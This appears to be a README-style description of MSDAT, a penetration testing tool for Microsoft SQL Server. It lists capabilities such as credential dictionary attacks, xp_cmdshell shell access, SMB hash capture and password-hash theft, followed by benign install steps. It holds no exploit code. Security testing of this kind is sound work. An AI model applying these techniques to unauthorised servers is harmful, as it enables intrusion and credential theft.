MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:

You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
You have a valid Microsoft SQL account on a database and you want to escalate your privileges
You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)

Tested on Microsof SQL database 2005, 2008 and 2012.

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:

get technical information (ex: database version) of a MSSQL database without to be authenticated
search MSSQL accounts with a dictionnary attack
test each login as password (authentication required)
get a windows shell on the database server with
- xp_cmdshell
download files remotely with:
- OLE Automation
- bulkinsert
- openrowset
upload files on the server with:
- OLE Automation
- openrowset
capture a SMB authentication thanks to:
- bulkinsert
- openrowset
- xp_dirtree
- xp_fileexist
- xp-getfiledetails
steal MSSQL hashed password, on an any MSSQL version
scan ports through the database:
- openrowset
execute SQL requests on a remote MSSQL server trough the database (target) with:
- bulkinsert
- openrowset
list files/directories with:
- xp_subdirs
- xp_dirtree
list drives/medias with:
- xp_fixeddrives
- xp_availablemedia
create folder with:
- xp_create_subdir

Some dependancies must be installed in order to run MSDAT.

In ubuntu:

sudo apt-get install freetds-dev

sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete

Add “use ntlmv2 = yes” in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:

[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes